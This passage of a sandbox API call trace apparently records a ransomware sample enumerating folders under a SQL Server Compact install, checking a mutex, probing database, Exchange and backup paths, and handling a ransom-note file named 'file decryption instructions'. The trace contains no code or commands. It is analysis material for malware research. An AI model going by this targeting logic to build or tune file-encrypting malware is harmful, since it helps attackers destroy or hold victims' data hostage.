(in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.109] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=36, lpWideCharStr=0x18e0b0, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.109] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceqp35.dll", cchWideChar=72, lpMultiByteStr=0x18e08c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceqp35.dllè", lpUsedDefaultChar=0x0) returned 72 [0104.110] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.110] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0b0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllmpact Edition\\v3.5\\sqlceqp35.dllè", lpUsedDefaultChar=0x0) returned 4 [0104.110] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 1 [0104.110] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.110] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.110] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.110] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.110] GlobalUnlock (hMem=0x45000c) returned 0 [0104.110] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.110] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.110] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.110] GlobalUnlock (hMem=0x45000c) returned 0 [0104.110] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.110] GlobalUnlock (hMem=0x450004) returned 0 [0104.110] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.111] CharLowerBuffW (in: lpsz="sqlcese35.dll", cchLength=0xd | out: lpsz="sqlcese35.dll") returned 0xd [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="3", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3ñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x18e0a8, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sñ\x18", lpUsedDefaultChar=0x0) returned 1 [0104.111] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18e0b0, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0104.111] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcese35.dll", cchWideChar=72, lpMultiByteStr=0x18e08c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlcese35.dllè", lpUsedDefaultChar=0x0) returned 72 [0104.112] CharLowerBuffW (in: lpsz=".dll", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0104.112] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18e0b0, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllmpact Edition\\v3.5\\sqlcese35.dllè", lpUsedDefaultChar=0x0) returned 4 [0104.112] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 0 [0104.112] GetLastError () returned 0x12 [0104.112] FindClose (in: hFindFile=0x575030 | out: hFindFile=0x575030) returned 1 [0104.113] GlobalLock (hMem=0x450004) returned 0x588000 [0104.113] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.113] GlobalUnlock (hMem=0x450004) returned 0 [0104.113] GlobalLock (hMem=0x450004) returned 0x588000 [0104.113] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.113] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.113] GlobalUnlock (hMem=0x450004) returned 0 [0104.113] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.113] GlobalUnlock (hMem=0x45000c) returned 0 [0104.113] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*", lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575030 [0104.115] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f114 | out: lpLocalFileTime=0x18f114) returned 1 [0104.115] FileTimeToDosDateTime (in: lpFileTime=0x18f114, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.115] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.115] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.115] GlobalUnlock (hMem=0x45000c) returned 0 [0104.115] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.116] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.116] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.116] GlobalUnlock (hMem=0x45000c) returned 0 [0104.116] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.116] GlobalUnlock (hMem=0x450004) returned 0 [0104.116] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.116] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0104.116] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.116] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.116] GlobalLock (hMem=0x450004) returned 0x588000 [0104.116] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.116] GlobalUnlock (hMem=0x450004) returned 0 [0104.116] GlobalLock (hMem=0x450004) returned 0x588000 [0104.116] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.116] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.116] GlobalUnlock (hMem=0x450004) returned 0 [0104.116] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.116] GlobalUnlock (hMem=0x45000c) returned 0 [0104.116] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.117] FindNextFileW (in: hFindFile=0x575030, lpFindFileData=0x18f1f0 | out: lpFindFileData=0x18f1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0104.117] FileTimeToLocalFileTime (in: lpFileTime=0x18f204, lpLocalFileTime=0x18f110 | out: lpLocalFileTime=0x18f110) returned 1 [0104.117] FileTimeToDosDateTime (in: lpFileTime=0x18f110, lpFatDate=0x18f1d2, lpFatTime=0x18f1d0 | out: lpFatDate=0x18f1d2, lpFatTime=0x18f1d0) returned 1 [0104.117] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.117] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.117] GlobalUnlock (hMem=0x45000c) returned 0 [0104.117] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.117] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.117] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.117] GlobalUnlock (hMem=0x45000c) returned 0 [0104.117] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.117] GlobalUnlock (hMem=0x450004) returned 0 [0104.117] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.117] GlobalLock (hMem=0x450004) returned 0x588000 [0104.117] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.117] GlobalUnlock (hMem=0x450004) returned 0 [0104.117] GlobalLock (hMem=0x450004) returned 0x588000 [0104.117] GlobalLock (hMem=0x45000c) returned 0x58a010 [0104.118] GlobalHandle (pMem=0x588000) returned 0x450004 [0104.118] GlobalUnlock (hMem=0x450004) returned 0 [0104.118] GlobalHandle (pMem=0x58a010) returned 0x45000c [0104.118] GlobalUnlock (hMem=0x45000c) returned 0 [0104.118] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0104.118] SysReAllocStringLen (in: pbstr=0x18f110*=0x0, psz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop", len=0x42 | out: pbstr=0x18f110*="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop") returned 1 [0104.118] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.118] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.118] GlobalUnlock (hMem=0x45000c) returned 0 [0104.118] GlobalLock (hMem=0x45000c) returned 0x588000 [0104.118] GlobalLock (hMem=0x450004) returned 0x58a010 [0104.118] GlobalHandle (pMem=0x588000) returned 0x45000c [0104.118] GlobalUnlock (hMem=0x45000c) returned 0 [0104.118] GlobalHandle (pMem=0x58a010) returned 0x450004 [0104.118] GlobalUnlock (hMem=0x450004) returned 0 [0104.118] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Microsoft\\Exchange Server", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="䱈@嗎X喢X企@\x18㸼V\x18\x1b")) returned 0xffffffff [0104.119] GetLastError () returned 0x3 [0104.119] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.119] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=26, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0104.119] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=21, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\犈X\x01") returned 21 [0104.119] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Microsoft SQL Server", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@唜X企@\x18긴V\x181")) returned 0xffffffff [0104.122] GetLastError () returned 0x2 [0104.122] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.122] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d270, cbMultiByte=21, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0104.122] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=9, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\犈X\x01") returned 9 [0104.122] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Firebird", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@嗤X企@\x18㟄X\x18;")) returned 0xffffffff [0104.122] GetLastError () returned 0x2 [0104.123] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.123] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=9, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0104.123] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=8, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\犈X\x01") returned 8 [0104.123] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\MSSQL.1", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@唜X企@\x18㥼X\x18D")) returned 0xffffffff [0104.123] GetLastError () returned 0x2 [0104.123] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.123] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=8, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\\x10") returned 8 [0104.124] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=37, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\") returned 37 [0104.124] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@嗤X企@\x18召X\x18j")) returned 0xffffffff [0104.124] GetLastError () returned 0x2 [0104.124] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.124] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=37, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\") returned 37 [0104.124] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\") returned 6 [0104.125] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Adobe", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@坴X企@\x18㟄X\x18q")) returned 0xffffffff [0104.125] GetLastError () returned 0x2 [0104.125] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.125] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=6, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="adobe\\叨XP") returned 6 [0104.125] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\") returned 7 [0104.125] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Oracle", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@唜X企@\x18㥼X\x18y")) returned 0xffffffff [0104.126] GetLastError () returned 0x2 [0104.126] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="oracle\\X\x10") returned 7 [0104.126] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\") returned 7 [0104.126] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Archive", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="咄X䱠@坴X企@\x18㟄X\x18\x81")) returned 0xffffffff [0104.126] GetLastError () returned 0x2 [0104.126] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\", cchLength=0x43 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\desktop\\") returned 0x43 [0104.127] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=7, lpWideCharStr=0x18dd90, cchWideChar=2047 | out: lpWideCharStr="archiveX\x10") returned 7 [0104.127] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18ddd8, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\") returned 6 [0104.127] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\Backup", lpFindFileData=0x18eb8c | out: lpFindFileData=0x18eb8c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, 